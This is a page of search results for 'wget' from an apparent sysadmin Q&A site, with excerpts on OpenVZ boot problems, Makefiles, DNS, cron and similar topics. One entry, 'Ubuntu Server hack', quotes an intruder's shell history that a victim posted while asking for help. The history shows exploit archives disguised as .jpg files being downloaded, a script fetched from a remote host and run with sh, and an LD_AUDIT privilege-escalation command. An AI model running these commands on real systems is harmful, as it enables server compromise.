Search Results

Search found 593 results on 24 pages for 'wget'.

Page 7/24 | < Previous Page | 3 4 5 6 7 8 9 10 11 12 13 14  | Next Page >

  • Reset rc.d so software starts at boot again

    - by natli
    I ran the following 2 commands on my VPS box and now it boots without starting any software at all. According to rcconf it's still supposed to start my chosen software (ssh etc.) but it doesn't. update-rc.d vz defaults update-rc.d vzeventd defaults I already tried removing them again with update-rc.d -f vz remove update-rc.d -f vzeventd remove But that didnt't change anything. /etc/rc.local also still correctly lists some scripts I want to run at start-up, but they don't seem to be called either. I expect the top 2 commands to be responsible, but here's everything I did: mkdir /var/openvz-dl cd /var/openvz-dl wget http://download.openvz.org/kernel/branches/rhel6-2.6.32/042stab062.2/vzkernel-2.6.32-042stab062.2.x86_64.rpm wget http://download.openvz.org/kernel/branches/rhel6-2.6.32/042stab062.2/vzkernel-devel-2.6.32-042stab062.2.x86_64.rpm wget http://download.openvz.org/utils/vzctl/4.0/vzctl-4.0-1.x86_64.rpm wget http://download.openvz.org/utils/vzctl/4.0/vzctl-core-4.0-1.x86_64.rpm wget http://download.openvz.org/utils/ploop/1.5/ploop-1.5-1.x86_64.rpm wget http://download.openvz.org/utils/ploop/1.5/ploop-lib-1.5-1.x86_64.rpm wget http://download.openvz.org/utils/vzquota/3.1/vzquota-3.1-1.x86_64.rpm apt-get install fakeroot alien fakeroot alien --to-deb --scripts --keep-version vz*.rpm ploop*.rpm dpkg -i vz*.deb ploop*.deb --force-overwrite update-rc.d vz defaults update-rc.d vzeventd defaults reboot A huge part of that failed because I was running it on an OpenVZ VPS which has a shared kernel that can't be altered, so I also had to fix the dpkg like so (it was moaning about wanting to install vzkernel with a package not being found); rm /var/lib/dpkg/info/vzkernel* dpkg-reconfigure vzkernel --force dpkg --purge --force-all vzkernel But that didn't fix the boot issue either. How do I make my software start at boot again?

    Read the article

  • make include directive and dependency generation with -MM

    - by Robert S. Barnes
    I want a build rule to be triggered by an include directive if the target of the include is out of date or doesn't exist. Currently the makefile looks like this: program_NAME := wget++ program_H_SRCS := $(wildcard *.h) program_CXX_SRCS := $(wildcard *.cpp) program_CXX_OBJS := ${program_CXX_SRCS:.cpp=.o} program_OBJS := $(program_CXX_OBJS) DEPS = make.deps .PHONY: all clean distclean all: $(program_NAME) $(DEPS) $(program_NAME): $(program_OBJS) $(LINK.cc) $(program_OBJS) -o $(program_NAME) clean: @- $(RM) $(program_NAME) @- $(RM) $(program_OBJS) @- $(RM) make.deps distclean: clean make.deps: $(program_CXX_SRCS) $(program_H_SRCS) $(CXX) $(CPPFLAGS) -MM $(program_CXX_SRCS) > make.deps include $(DEPS) The problem is that it seems like the include directive is executing before the rule to build make.deps which effectively means make either getting no dependency list if make.deps doesn't exist or always getting the make.deps from the previous build and not the current one. For example: $ make clean $ make makefile:32: make.deps: No such file or directory g++ -MM addrCache.cpp connCache.cpp httpClient.cpp wget++.cpp > make.deps g++ -c -o addrCache.o addrCache.cpp g++ -c -o connCache.o connCache.cpp g++ -c -o httpClient.o httpClient.cpp g++ -c -o wget++.o wget++.cpp g++ addrCache.o connCache.o httpClient.o wget++.o -o wget++

    Read the article

  • How can I force WiFi connection to only use ipv4?

    - by krasilich
    I have Broadcom bcm43224 wifi card with proprietary broadcom sta driver. At home wifi connection works well, but in the office when I ping some resource there is a lot of loss packets and I cant browse websites. I have tried another way to check internet connection - download file with wget. wget google.com - very slow speed wget -4 google.com - normal speed So, it seems that the problem is with the ipv6 configuration at the office, can I force my wifi connection to use only ipv4 and completely ignore ipv6 ?.

    Read the article

  • Ubuntu Server hack [closed]

    - by haxpanel
    Hi! I looked at netstat and I noticed that someone besides me is connected to the server by ssh. I looked after this because my user has the only one ssh access. I found this in an ftp user .bash_history file: w uname -a ls -a sudo su wget qiss.ucoz.de/2010/.jpg wget qiss.ucoz.de/2010.jpg tar xzvf 2010.jpg rm -rf 2010.jpg cd 2010/ ls -a ./2010 ./2010x64 ./2.6.31 uname -a ls -a ./2.6.37-rc2 python rh2010.py cd .. ls -a rm -rf 2010/ ls -a wget qiss.ucoz.de/ubuntu2010_2.jpg tar xzvf ubuntu2010_2.jpg rm -rf ubuntu2010_2.jpg ./ubuntu2010-2 ./ubuntu2010-2 ./ubuntu2010-2 cat /etc/issue umask 0 dpkg -S /lib/libpcprofile.so ls -l /lib/libpcprofile.so LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping ping gcc touch a.sh nano a.sh vi a.sh vim wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh nano ubuntu10.sh ls -a rm -rf ubuntu10.sh . .. a.sh .cache ubuntu10.sh ubuntu2010-2 ls -a wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh ls -a rm -rf ubuntu10.sh wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe rm -rf W2Ksp3.exe passwd The system is in a jail. Does it matter in the current case? What shall i do? Thanks for everyone!! I have done these: - ban the connected ssh host with iptables - stoped the sshd in the jail - saved: bach_history, syslog, dmesg, files in the bash_history's wget lines

    Read the article

  • PHP set timeout for script with system call, set_time_limit not working

    - by tehalive
    I have a command-line PHP script that runs a wget request using each member of an array with foreach. This wget request can sometimes take a long time so I want to be able to set a timeout for killing the script if it goes past 15 seconds for example. I have PHP safemode disabled and tried set_time_limit(15) early in the script, however it continues indefinitely. Update: Thanks to Dor for pointing out this is because set_time_limit() does not respect system() calls. So I was trying to find other ways to kill the script after 15 seconds of execution. However, I'm not sure if it's possible to check the time a script has been running while it's in the middle of a wget request at the same time (a do while loop did not work). Maybe fork a process with a timer and set it to kill the parent after a set amount of time? Thanks for any tips! Update: Below is my relevant code. $url is passed from the command-line and is an array of multiple URLs (sorry for not posting this initially): foreach( $url as $key => $value){ $wget = "wget -r -H -nd -l 999 $value"; system($wget); }

    Read the article

  • Not being able to `make` in terminal on Mac OS X 10.7

    - by AlanTuring
    Hi so i am trying to install the commands wget and with-readline for use with Mac OS X's terminal. The configuration seems to work fine for both even though i am required to specify for the first one, host= i686-apple. When i get to the make part of the installation, the output is as follows. For wget: for with-readline so does anyone have any idea what's going on? Pastie links: wget: http://pastie.org/4925079 with-readline: http://pastie.org/4925083 Thanks in advance.

    Read the article

  • Choose IP Adress for Process to use on launch [duplicate]

    - by user1436026
    This question already has an answer here: How to set which IP to use for a HTTP request? 2 answers Say my server has the following IP addresses: 123.456.78.0 123.467.79.1 123.456.77.1 123.456.68.0 etc... Say I want to launch a process, say wget from the command line. Normally, I would do something like this: wget http://www.google.com/ Except that I would like to choose the IP address that my server uses to make this request. Is there a way to use wget or launch another command with a choice of one of my own IP addresses, like the following pseudo command: with-ip 123.456.68.0 wget http://www.google.com/

    Read the article

  • Can't run utilities/.exe's that use the network from a [DFS] windows share on Windows 2008 servers. Can this be overcome?

    - by Jim Lawhon
    Under Windows Server 2008 I'm unable to run many utilities that use network resources. This works just fine under Windows Server 2003. For example: \\domain\dfs\tools$\bin\sendmail.exe ... \\domain\dfs\tools$\bin\psexec.exe ... echo %_metric% %_value% %_unixtime% | \\domain\dfs\bin\foo$\nc graphite.domain 2003 -w1 Reproducing and maintaining this folder on a large number of servers/vm's is not desirable. Is there a way to allow Windows Server 2008 to run these tools? If so, can this be enabled via GPO or in a fashion that can be scripted during automated builds? Edit: The commands/tools do work just fine, when run from local drives. Edit2: Wget example: d:\scripts\helpers>z:\bin\wget http://www.google.com SYSTEM_WGETRC = c:/progra~1/wget/etc/wgetrc syswgetrc = z:/etc/wgetrc --2011-04-11 00:32:15-- http://www.google.com/ Resolving www.google.com... failed: Host not found. z:\bin\wget: unable to resolve host address `www.google.com' wget can neither use DNS to resolve the IP nor can it use HTTP if provided an IP directly. Edit3: The problem seems to be tied to DFS/DFS shares. Tools run correctly from other normal windows-server file-shares. They also run correctly when run directly from the file-servers behind the DFS. They only fail when we attempt to run them from the DFS UNC path or mapped drives.

    Read the article

  • What's the extra FTP port here?

    - by warl0ck
    While downloading a tar ball from gnu's FTP server, I found that other than standard 21 TCP port connection, I also seeing an extra connection: tcp 0 0 192.168.1.109:45056 208.118.235.20:21 ESTABLISHED 10956/wget tcp 0 0 192.168.1.109:56724 208.118.235.20:22259 ESTABLISHED 10956/wget What that port is used for? I checked /etc/services, only 20 and 21 should be in use, am I wrong? The command in use was wget 'ftp://ftp.gnu.org/gnu/tar/tar-1.26.tar.xz'

    Read the article

  • run cron on ssh, error message

    - by user1790649
    how to run the script below * * * * * /usr/bin/wget -O - -q "http://example.com/scheduler/cron" when i run the script, the error message show as below: $ * * * * * /usr/bin/wget -O - -q "http://website.com/?q=admin/settings/scheduler/cron" -sh: CHANGELOG.txt: not found $ 30 15 * * * /usr/bin/wget -O - -q "http://website.com/?q=admin/settings/scheduler/cron" -sh: 30: not found can the script above run in ssh (using putty software)

    Read the article

  • Cron job fails for any time other than default * * * * *

    - by Raghu
    On Ubuntu 11.10 (Oneiric Ocelot), my cron job run fine if I use the default * * * * * But if I want it to run at 17 hrs or any other time, it never runs. My settings are: 00 17 * * * wget http://www.abc.com/a.php I also tried: 00 17 * * * root wget http://www.abc.com/a.php I also tried specifying the path. There is a carriage return, and I'm logged in as root Here is my complete crontab: TZ=Australia/Sydney 22 7 * * * /usr/bin/wget http://www.abc.com/a.php 22 7 * * * /bin/date >> /tmp/date.txt ----the out put is as follws: root@Scrunch:~# sudo crontab -l -u root 55 12 * * * date >>/tmp/crontest.txt root@Scrunch:~# Why is the terminal displaying so many blank lines after outputting the crontab entries? do you suspect unnecessary carriage lines are given....And i have not given any entries any other cron spaces like .d,/daily eyc.,

    Read the article

  • Remove Kernel 3.1

    - by chazdg
    Is there a way to remove kernel 3.1 from Oneiric? I downloaded and upgraded to 3.1 with these instructions: Open the terminal and run these two commands for both 32-bit and 64-bit versions of Ubuntu 11.10/11.04: wget http://kernel.ubuntu.com/~kernel-ppa...241006_all.deb sudo dpkg -i linux-headers-3.1.0-030100_3.1.0-030100.201110241006_all.deb Ubuntu (64-bit) For Ubuntu 11.10/11.04 (64-bit), issue these commands: wget http://kernel.ubuntu.com/~kernel-ppa...1006_amd64.deb sudo dpkg -i linux-headers-3.1.0-030100-generic_3.1.0-030100.201110241006_amd64.deb wget http://kernel.ubuntu.com/~kernel-ppa...1006_amd64.deb sudo dpkg -i linux-image-3.1.0-030100-generic_3.1.0-030100.201110241006_amd64.deb Everything went well. I was able to reboot quickly, but Firefox and Chrome constantly crash with Kernel 3.1. I am using Gnome 3.2 and saw improvement with 3.0.0.13 provided by ppa. Any help with 3.1 or just removing it would be helpful. Thanks to all that reply.

    Read the article

  • Can not enter password for sudo [duplicate]

    - by Michael
    This question already has an answer here: add repository to ubuntu from terminal with pgp key 3 answers I have used Ubuntu for several years, and I can not enter password for sudo, and this is when i wanna add a key to public.gpg for itunes10 it dos not work, and the password normal works wite sudo but not in the terminal when i enter: sudo wget -q "http:// deb.playonlinux.com/public.gpg" -o- | sudo apt-get add - and it says this 'sorry try again', and i just had installed itunes10, and have to add a key whit wget to public.gpg, and i tried to enter in the terminal: sudo apt-get update and the password works fine but not whit using sudo wget, and can some one please help.

    Read the article

  • Execute linux AT Command via PHP

    - by ahmad Rabie
    When I run this code via ssh echo wget http://domain.com/send_me_email.php | at 12:54 it run correctly and send me an email at that time. but if I run a php Like this exec("echo wget http://domain.com/send_me_email.php | at 12:54"); exec("atq",$arr); print_r($arr); result of that code is something like this : job 63 at 2011-11-27 12:54 ,As you can see the job created successfully but I don't receive any Email at that time?! I test this line in php exec("wget http://domain.com/send_me_email.php"); and it send me an email, it means that I have permission to run exec and wget via php.but what is problem? I cant understand what is my problem. Please help me. thanks

    Read the article

  • gitk without X11 [closed]

    - by svnpenn
    It has been noted here that Tcl/Tk, and in turn gitk now require X11 under Cygwin. Having run it before and after this change it seems like extreme overkill. I use gitk very lightly, mostly sticking to simply command line git. How could I go about using gitk without X11, perhaps manually installing old version of Tcl/Tk? After some tinkering, I came up with this script that allows gitk without X11 #!/bin/sh # Requires Cygwin packages: git, make, mingw64-i686-gcc-core, wget # Install Tcl wget prdownloads.sf.net/tcl/tcl8.5.12-src.tar.gz tar xf tcl8.5.12-src.tar.gz cd tcl8.5.12/win ./configure --host i686-w64-mingw32 make install cd - # Install Tk wget prdownloads.sf.net/tcl/tk8.5.12-src.tar.gz tar xf tk8.5.12-src.tar.gz cd tk8.5.12/win ./configure --host i686-w64-mingw32 make install cd - # Install gitk cd /usr/local/bin wget raw.github.com/git/git/master/gitk-git/gitk chmod 700 gitk echo 'cygpath -m "$1" | xargs -I% wish85 % -- ${@:3}' > wish cd -

    Read the article

  • Ubuntu server 12.04 E: Unable to locate package noip2

    - by cesar
    I just Installed Ubuntu server 12.04 and I want to install no-ip I ran as root: sudo apt-get install noip2 and I got this: root@topcat:/var# sudo apt-get install noip2 Reading package lists... Done Building dependency tree Reading state information... Done E: Unable to locate package noip2 I also tried with:wget htt://www.no-ip.com/client/linux/noip-duc-linux.tar.gz but I got: wget: unable to resolve host address `www.no-ip.com' Does somebody can help me?, I am new in Ubuntu

    Read the article

  • How to download Vim script on the command-line?

    - by HaiYuan Zhang
    Whenever I want to install a new Vim script on the Linux server I'm working on, my typical workflow is as the following: surf the plugin's homepage in Vim online using FireXXXX download a right version of the plugin to my laptop by click some highlighted link upload the downloaded plugin from my laptop to Linux server using WinSCP which is really inconvenient. I don't know what is the magic behind this: I mean for the same hyperlink I click it in web browser. I can let you download it but use Wget plus the hyperlink in Linux command-line will end up with nothing but an error indication. Hyperlink in the web browser. Otherwise I can get the link in web browser and then use Wget or some similar tool to actually do the downloding. I try new cool Vim scripts quite ofte , so you can imagine my dismay when I have to repeat the tedious action all the time. What are some tips which can let me download the Vim scripts in a more "professional" way? Post edit: My problem is not find a tool like Wget or cURL. The problem I met is quite specific; to use these tools to download a Vim script. Let's take http://www.vim.org/scripts/script.php?script_id=30 as an example. It's the normal place where one can get the script, at least for me. But I can't find an working URL from this page that can feed to Wget.

    Read the article

  • how to download vim script in command line

    - by HaiYuan Zhang
    whenever I want to install a new vim script to the linux server I'm working in , my typical workflow is as the following: surf the plugin's homepage in vim online using fireXXXX download a right version of the plugin to my laptop by click some highlighted link upload the downloaded plugin from my laptop to linux server using winscp which is really inconvenient. I don't know what is the magic behind this : I mean for the same hyperlinki click it in web browser I can let you download it but use wget plus the hyperlink in linux commandline will end up with nothing but error indication. hyperlink in web browser . otherwise I can get the link in web browser and then use wget or some similar tool to actually do the downloding. I try new cool vim scripts quite often , so you can imagin my dismay when have to repeat the tedious action all the time. So if anyone of you knows some tips which can let me downloading the vim scripts in a more "professional" way, I'll appreciate it a lot. post edit : My problem is not find a tool like wget or curl . The problem I met is quite specific to use these tools to download vim script. let's take http://www.vim.org/scripts/script.php?script_id=30 as an example, it's the normal place where one can get the script, at least for me. but I can't find an working url from this page that can feed to wget .

    Read the article

  • How to download Vim script on the command-line?

    - by HaiYuan Zhang
    Whenever I want to install a new Vim script on the Linux server I'm working on, my typical workflow is as the following: surf the plugin's homepage in Vim online using FireXXXX download a right version of the plugin to my laptop by click some highlighted link upload the downloaded plugin from my laptop to Linux server using WinSCP which is really inconvenient. I don't know what is the magic behind this: I mean for the same hyperlink I click it in web browser. I can let you download it but use Wget plus the hyperlink in Linux command-line will end up with nothing but an error indication. Hyperlink in the web browser. Otherwise I can get the link in web browser and then use Wget or some similar tool to actually do the downloding. I try new cool Vim scripts quite ofte , so you can imagine my dismay when I have to repeat the tedious action all the time. What are some tips which can let me download the Vim scripts in a more "professional" way? Post edit: My problem is not find a tool like Wget or cURL. The problem I met is quite specific; to use these tools to download a Vim script. Let's take http://www.vim.org/scripts/script.php?script_id=30 as an example. It's the normal place where one can get the script, at least for me. But I can't find an working URL from this page that can feed to Wget.

    Read the article

  • How to solve CUDA crash when run CUDA example fluidsGL?

    - by sam
    I use ubuntu 12.04 64 bits with GTX560Ti. I install CUDA by following instruction: wget http: //developer.download.nvidia.com/compute/cuda/4_2/rel/toolkit/cudatoolkit_4.2.9_lin ux_64_ubuntu11.04.run wget http: //developer.download.nvidia.com/compute/cuda/4_2/rel/drivers/devdriver_4.2_linux _64_295.41.run wget http: //developer.download.nvidia.com/compute/cuda/4_2/rel/sdk/gpucomputingsdk_4.2.9 _linux.run chmod +x cudatoolkit_4.2.9_linux_64_ubuntu11.04.run sudo ./cudatoolkit_4.2.9_linux_64_ubuntu11.04.run echo "/usr/local/cuda/lib64" > ~/cuda.conf echo "/usr/local/cuda/lib" >> ~/cuda.conf sudo mv ~/cuda.conf /etc/ld.so.conf.d/cuda.conf sudo ldconfig echo 'export PATH=$PATH:/usr/local/cuda/bin' >> ~/.bashrc chmod +x gpucomputingsdk_4.2.9_linux.run ./gpucomputingsdk_4.2.9_linux.run sudo apt-get install build-essential libx11-dev libglu1-mesa-dev freeg lut3-dev libxi-dev libxmu-dev gcc-4.4 g++-4.4 sed 's/g++ -fPIC/g++-4.4 -fPIC/g' ~/NV IDIA_GPU_Computing_SDK/C/common/common.mk > ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk.bak; mv ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk.bak ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk sed 's/gcc -fPIC/gcc-4.4 -fPIC/g' ~/NV IDIA_GPU_Computing_SDK/C/common/common.mk > ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk.bak; mv ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk.bak ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk sed 's/-L$(SHAREDDIR)\/lib/-L$(SHAREDDIR)\/lib -L\/u sr\/lib\/nvidia-current/g' ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk > ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk.bak; mv ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk.bak ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk sed 's/-L$(SHAREDDIR)\/lib -L\/usr\/lib\/nvidia-current $(NV CUVIDLIB)/-L$(SHAREDDIR)\/lib $(NVCUVIDLIB)/g' ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk > ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk.bak; mv ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk.bak ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk After I run ~/NVIDIA_GPU_Computing_SDK/C/bin/linux/release/./fluidsGL It got stuck even mouse or keyboard couldn't move. How to solve it? Thank you~

    Read the article

  • How can I check Internet connectivity in a console?

    - by Ashfame
    Is there an easy way to check Internet connectivity from console? I am trying to play around in a shell script. One idea I seem is to wget --spider http://www.google.co.in/ and check the HTTP response code to interpret if the Internet connection is working fine. But I think there must be easy way without the need of checking a site that never crash ;) Edit: Seems like there can be a lot of factors which can be individually examined, good thing. My intention at the moment is to check if my blog is down. I have setup cron to check it every minute. For this, I am checking the HTTP response code of wget --spider to my blog. If its not 200, it notifies me (I believe this will be better than just pinging it, as the site may under be heavy load and may be timing out or respond very late). Now yesterday, there was some problem with my Internet. LAN was connected fine but just I couldn't access any site. So I keep on getting notifications as the script couldn't find 200 in the wget response. Now I want to make sure that it displays me notification when I do have internet connectivity. So, checking for DNS and LAN connectivity is a bit overkill for me as I don't have that much specific need to figure out what problem it is. So what do you suggest how I do it?

    Read the article

  • Download acceleration with jigdo?

    - by james
    Im using jigdo-lite to download a Debian DVD ISO. I already have the CD version of the image, so I added the CD files to the task. Now I need to download many files (not all) of the DVD ISO. The default jigdo-lite uses wget to download files. It seems jigdo (wget) downloads only one file at a time with one connection. So I'm getting a low download speed. How can I accelerate the download speed using jigdo? Possible Solutions: Using different download manager with jigdo. Is it possible? If yes, How? Using jigdo (wget) to download multiple files at once. How? Getting download links of remaining files to download so that they can be downloaded with a download manager and later added to jigdo iso. How?

    Read the article

  • DNS problems on CentOS fresh install

    - by Rick Koshi
    I'm having some DNS issues on a new box I'm installing with CentOS 6.2. I am able to look up names using nslookup, dig, or host. I am able to ping machines by name or by IP address. However, when I try other tools, such as ssh, wget, or yum, they are unable to resolve names. For example: # wget http://www.google.com --2012-03-08 14:48:06-- http://www.google.com/ Resolving www.google.com... failed: Name or service not known. wget: unable to resolve host address `www.google.com' # ssh www.google.com ssh: Could not resolve hostname www.google.com: Name or service not known # ping -c 1 www.google.com PING www.l.google.com (74.125.113.106) 56(84) bytes of data. 64 bytes from vw-in-f106.1e100.net (74.125.113.106): icmp_seq=1 ttl=46 time=43.6 ms --- www.l.google.com ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 59ms rtt min/avg/max/mdev = 43.665/43.665/43.665/0.000 ms # host www.google.com www.google.com is an alias for www.l.google.com. www.l.google.com has address 74.125.113.99 www.l.google.com has address 74.125.113.103 www.l.google.com has address 74.125.113.104 www.l.google.com has address 74.125.113.105 www.l.google.com has address 74.125.113.106 www.l.google.com has address 74.125.113.147 My /etc/nsswitch.conf file is the default, including this (standard) line: hosts: files dns /etc/resolv.conf is as set up by DHCP: ; generated by /sbin/dhclient-script nameserver 192.168.1.254 192.168.1.254 is a working DNS server (my DSL modem, working for years with other machines) Anyone know why ping would work, but ssh/wget would fail? Per NcA's suggestion, I tried changing /etc/resolv.conf to point to 8.8.8.8. Oddly enough, this does make it work. Obviously, my DSL modem is responding to DNS requests in some way that some parts of Linux's resolution system don't like. Looking at the tcpdump, I am unable to see what the difference is. Certainly, both servers are sending the same addresses. Here's the output from tcpdump -nn -X with the server set to the DNS server on the DSL modem. It's clearly replying with the correct addresses, but ssh/wget don't seem happy with it for some reason: 15:53:52.133580 IP 192.168.1.254.53 > 192.168.1.2.54836: 33157 7/0/0 CNAME www.l.google.com., A 74.125.115.105, A 74.125.115.106, A 74.125.115.147, A 74.125.115.99, A 74.125.115.103, A 74.125.115.104 (148) 0x0000: 4500 00b0 e33a 0000 ff11 53b1 c0a8 01fe E....:....S..... 0x0010: c0a8 0102 0035 d634 009c 7528 8185 8180 .....5.4..u(.... 0x0020: 0001 0007 0000 0000 0377 7777 0667 6f6f .........www.goo 0x0030: 676c 6503 636f 6d00 0001 0001 c00c 0005 gle.com......... 0x0040: 0001 0007 acd0 0008 0377 7777 016c c010 .........www.l.. 0x0050: c02c 0001 0001 0000 0001 0004 4a7d 7369 .,..........J}si 0x0060: c02c 0001 0001 0000 0001 0004 4a7d 736a .,..........J}sj 0x0070: c02c 0001 0001 0000 0001 0004 4a7d 7393 .,..........J}s. 0x0080: c02c 0001 0001 0000 0001 0004 4a7d 7363 .,..........J}sc 0x0090: c02c 0001 0001 0000 0001 0004 4a7d 7367 .,..........J}sg 0x00a0: c02c 0001 0001 0000 0001 0004 4a7d 7368 .,..........J}sh 15:53:52.135669 IP 192.168.1.254.53 > 192.168.1.2.54836: 65062- 0/0/0 (32) 0x0000: 4500 003c e33b 0000 ff11 5424 c0a8 01fe E..<.;....T$.... 0x0010: c0a8 0102 0035 d634 0028 98f9 fe26 8000 .....5.4.(...&.. 0x0020: 0001 0000 0000 0000 0377 7777 0667 6f6f .........www.goo 0x0030: 676c 6503 636f 6d00 001c 0001 gle.com..... I'm not enough of an expert to know if this is malformed in some way, but ping seems to do the right thing with it. For comparison, here's the same thing when querying 8.8.8.8: 15:57:27.990270 IP 8.8.8.8.53 > 192.168.1.2.49028: 59114 7/0/0 CNAME www.l.google.com., A 74.125.113.105, A 74.125.113.103, A 74.125.113.106, A 74.125.113.147, A 74.125.113.104, A 74.125.113.99 (148) 0x0000: 4500 00b0 5530 0000 2f11 6453 0808 0808 E...U0../.dS.... 0x0010: c0a8 0102 0035 bf84 009c 39f8 e6ea 8180 .....5....9..... 0x0020: 0001 0007 0000 0000 0377 7777 0667 6f6f .........www.goo 0x0030: 676c 6503 636f 6d00 0001 0001 c00c 0005 gle.com......... 0x0040: 0001 0001 516a 0008 0377 7777 016c c010 ....Qj...www.l.. 0x0050: c02c 0001 0001 0000 0116 0004 4a7d 7169 .,..........J}qi 0x0060: c02c 0001 0001 0000 0116 0004 4a7d 7167 .,..........J}qg 0x0070: c02c 0001 0001 0000 0116 0004 4a7d 716a .,..........J}qj 0x0080: c02c 0001 0001 0000 0116 0004 4a7d 7193 .,..........J}q. 0x0090: c02c 0001 0001 0000 0116 0004 4a7d 7168 .,..........J}qh 0x00a0: c02c 0001 0001 0000 0116 0004 4a7d 7163 .,..........J}qc 15:57:28.018909 IP 8.8.8.8.53 > 192.168.1.2.49028: 31984 1/1/0 CNAME www.l.google.com. (102) 0x0000: 4500 0082 7b1b 0000 2f11 3e96 0808 0808 E...{.../.>..... 0x0010: c0a8 0102 0035 bf84 006e c67e 7cf0 8180 .....5...n.~|... 0x0020: 0001 0001 0001 0000 0377 7777 0667 6f6f .........www.goo 0x0030: 676c 6503 636f 6d00 001c 0001 c00c 0005 gle.com......... 0x0040: 0001 0001 517f 0008 0377 7777 016c c010 ....Q....www.l.. 0x0050: c030 0006 0001 0000 0258 0026 036e 7334 .0.......X.&.ns4 0x0060: c010 0964 6e73 2d61 646d 696e c010 0016 ...dns-admin.... 0x0070: 91f3 0000 0384 0000 0384 0000 0708 0000 ................ 0x0080: 003c .< I still don't know why the server's reply is adequate for ping but not for ssh/wget. If anyone has ideas, I'd be happy to hear them. For now, though, I can either refer to an outside DNS server or set up my own server on the new box. It's a workaround that seems like it should be unnecessary, but will allow me to proceed.

    Read the article

< Previous Page | 3 4 5 6 7 8 9 10 11 12 13 14  | Next Page >